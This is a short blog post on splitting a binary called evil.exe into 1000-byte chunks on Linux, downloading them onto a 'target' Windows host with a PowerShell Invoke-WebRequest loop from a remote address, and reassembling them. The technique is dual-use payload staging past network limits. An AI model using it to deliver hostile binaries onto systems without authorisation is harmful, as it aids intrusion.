Recently, I needed to transfer a binary over a very limited network connection allowing only small packets to be sent. I ended up splitting the binary into pieces on my Linux box and reassembled the pieces on the target Windows host.
If, for some reason, you cannot use easier means like IP fragmentation and work with a smaller maximum transfer unit (MTU), here’s how to do the splitting and re-combining.
Split binary into pieces on Linux
Splitting a file into pieces on Linux is very straightforward – just use the split program (man).
The following command will split evil.exe into pieces of 1000 bytes, prefix them with chunk and use a numeric suffix for each chunk.
split -b 1000 -d evil.exe chunk
So we will end up with something like this:
chunk00 chunk16 chunk32 chunk48
chunk01 chunk17 chunk33 chunk49
chunk02 chunk18 chunk34 chunk50
chunk03 chunk19 chunk35 chunk51
chunk04 chunk20 chunk36 chunk52
chunk05 chunk21 chunk37 chunk53
chunk06 chunk22 chunk38 chunk54
chunk07 chunk23 chunk39 chunk55
chunk08 chunk24 chunk40 chunk56
chunk09 chunk25 chunk41 chunk57
chunk10 chunk26 chunk42 chunk58
chunk11 chunk27 chunk43 chunk59
chunk12 chunk28 chunk44
chunk13 chunk29 chunk45
chunk14 chunk30 chunk46
chunk15 chunk31 chunk47
Now that we have our chunks, we can host them for the Windows machine to download.
Download from Windows
To download the individual chunks to the Windows host, let’s use a quick PowerShell one-liner with Invoke-WebRequest:
0..59 | % { $chunk = 'chunk{0:d2}' -f $_; iwr 1.2.3.4/$chunk -outfile $chunk }
Combine the chunks
Now that we have all pieces to the puzzle, let’s assemble them into the self-contained binary we actually want, with Get-ChildItem, Get-Content and Set-Content:
gci -Filter "chunk*" | gc -Enc Byte -Read 1000 | sc evil.exe -Enc Byte
Doing a Get-FileHash evil.exe on the Windows host should now return the same hash as shasum -a 256 evil.exe on Linux.
✉️ Have a comment? Please send me an email.